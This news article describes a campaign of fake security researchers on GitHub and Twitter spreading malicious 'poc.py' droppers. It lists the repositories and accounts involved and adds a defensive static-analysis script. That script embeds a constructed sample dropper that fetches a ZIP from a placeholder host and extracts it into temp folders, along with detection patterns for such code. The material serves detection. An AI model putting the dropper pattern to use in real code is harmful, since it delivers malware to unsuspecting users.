Hackers have been found to be impersonating cybersecurity researchers on social platforms like Twitter and GitHub. This emerging trend was recently identified by the cybersecurity researchers at VulnCheck. These hackers are using this disguise to spread fake proof-of-concept exploits for zero-day vulnerabilities, which can infect both Windows and Linux operating systems.
One group of alleged experts who are actively involved in this malicious campaign is affiliated with a fraudulent cybersecurity company called ‘High Sierra Cyber Security’. They are creating repositories on platforms like GitHub that appear legitimate, with the individuals responsible for them pretending to be security experts from renowned companies like ‘Rapid7’. To add to the deception, they are even using the pictures of these security professionals.
To give their repositories more credibility, these hackers also create and manage Twitter accounts. Through social media, they try to lure unsuspecting victims into their traps. This malicious campaign has been ongoing since May 2023, and the hackers are promoting zero-day vulnerabilities in popular apps such as Chrome, Discord, Signal, WhatsApp, and Microsoft Exchange.
In each instance, the malicious repositories contain a Python script named ‘poc.py’, which serves as a means of downloading malware onto targeted systems. The script connects with a specific website to retrieve a ZIP file, which is then downloaded onto the victim’s computer. The choice of the ZIP file depends on the operating system in place. Linux and Windows users receive different files with different names.
The malware is written to a fixed directory on the infected system: ‘%Temp%’ on Windows and ‘/home//.local/share’ on Linux. The Windows binary is flagged by more than 60% of the antivirus engines on VirusTotal, a strong indication that it is malicious. The Linux binary is considerably stealthier and evades most scanners.
The exact nature of the installed malware remains uncertain, but both executables install a TOR client. Additionally, the Windows edition is recognized as a trojan with the ability to steal passwords.
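The behaviour described above (a ‘poc.py’ that branches on the operating system, fetches a ZIP from a remote site, and drops it under ‘%Temp%’ or ‘~/.local/share’) is a recognisable pattern that can be flagged before anyone runs a downloaded proof of concept. The following static triage script is an added example written for this article; it is not VulnCheck's code and not taken from any of the repositories listed. It parses a candidate script with Python's `ast` module and reports calls and string constants that match a dropper-style pattern. The call table, the path markers and the embedded sample script are all constructed for illustration; the sample points at the reserved ‘example.invalid’ domain and is only ever parsed, never executed.

```python
import ast

# Heuristic categories for calls commonly seen in download-and-extract droppers.
# (Constructed table; extend it for the tooling you see in your environment.)
SUSPICIOUS_CALLS = {
    "urllib.request.urlopen": "remote fetch",
    "urllib.request.urlretrieve": "remote fetch",
    "requests.get": "remote fetch",
    "zipfile.ZipFile": "archive handling",
    "platform.system": "OS branching",
    "subprocess.Popen": "process spawn",
    "subprocess.run": "process spawn",
    "os.system": "process spawn",
}

# Drop locations named in the VulnCheck write-up, lower-cased for matching.
SUSPICIOUS_STRINGS = ("%temp%", ".local/share")

# Constructed sample mimicking the reported poc.py behaviour. It is a string
# that the triage function parses; nothing in it is executed here.
SAMPLE_POC = '''\
import os, platform, urllib.request, zipfile

def fetch():
    if platform.system() == "Windows":
        dest = os.path.expandvars("%TEMP%")
        name = "win.zip"
    else:
        dest = os.path.expanduser("~/.local/share")
        name = "lin.zip"
    data = urllib.request.urlopen("https://example.invalid/" + name).read()
    path = os.path.join(dest, name)
    open(path, "wb").write(data)
    zipfile.ZipFile(path).extractall(dest)
'''


def _dotted_name(node):
    """Rebuild 'a.b.c' from a Name/Attribute chain; None for anything else
    (e.g. a call made on the result of another call)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def triage_poc_source(source):
    """Return (line, category, detail) findings for a Python source string."""
    tree = ast.parse(source)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.append((node.lineno, SUSPICIOUS_CALLS[name], name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            low = node.value.lower()
            if any(marker in low for marker in SUSPICIOUS_STRINGS):
                findings.append((node.lineno, "drop path", node.value))
    # ast.walk is breadth-first; sort so the report reads top to bottom.
    return sorted(findings)


def is_dropper_like(findings):
    """A remote fetch plus archive handling plus a known drop path is the
    combination worth escalating; any one of them alone is common in
    legitimate proof-of-concept code."""
    categories = {category for _, category, _ in findings}
    return {"remote fetch", "archive handling", "drop path"} <= categories


if __name__ == "__main__":
    report = triage_poc_source(SAMPLE_POC)
    for line, category, detail in report:
        print(f"line {line:>3}: {category:<16} {detail}")
    print("dropper-like:", is_dropper_like(report))
```

Run it on a ‘poc.py’ before executing anything from an unfamiliar repository; a positive result is a reason to detonate the script in a sandbox rather than on a workstation. The check is deliberately simple and is only a triage aid: obfuscated or string-assembled calls will not be caught, and the categories are combined precisely because a lone `requests.get` or `subprocess.run` appears in plenty of genuine exploit code.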
To protect users from falling victim to these malicious repositories and Twitter accounts, it is important to know which ones to avoid. Here are the repositories and Twitter accounts that should be avoided:
Malicious Repositories:
– https://github.com/AKuzmanHSCS/Microsoft-Exchange-RCE
– https://github.com/MHadzicHSCS/Chrome-0-day
– https://github.com/GSandersonHSCS/discord-0-day-fix
– https://github.com/BAdithyaHSCS/Exchange-0-Day
– https://github.com/RShahHSCS/Discord-0-Day-Exploit
– https://github.com/DLandonHSCS/Discord-RCE
– https://github.com/SSankkarHSCS/Chromium-0-Day
Fake Twitter Accounts:
– https://twitter.com/AKuzmanHSCS
– https://twitter.com/DLandonHSCS
– https://twitter.com/GSandersonHSCS
– https://twitter.com/MHadzicHSCS
Fake GitHub Accounts:
– https://github.com/AKuzmanHSCS
– https://github.com/RShahHSCS
– https://github.com/BAdithyaHSCS
– https://github.com/DLandonHSCS
– https://github.com/MHadzicHSCS
– https://github.com/GSandersonHSCS
– https://github.com/SSankkarHSCS
It is essential to exercise caution while browsing these platforms and interacting with unfamiliar accounts. Users should only download and trust files from verified and reputable sources. Taking these precautions can help protect against falling victim to malware and other cyber threats.
In conclusion, hackers are increasingly disguising themselves as cybersecurity researchers on social platforms to spread malicious exploits for zero-day vulnerabilities. Their deceptive tactics, such as creating fake GitHub and Twitter accounts, pose a significant risk to users. Recognizing and avoiding these malicious repositories and accounts is crucial to maintaining online security.
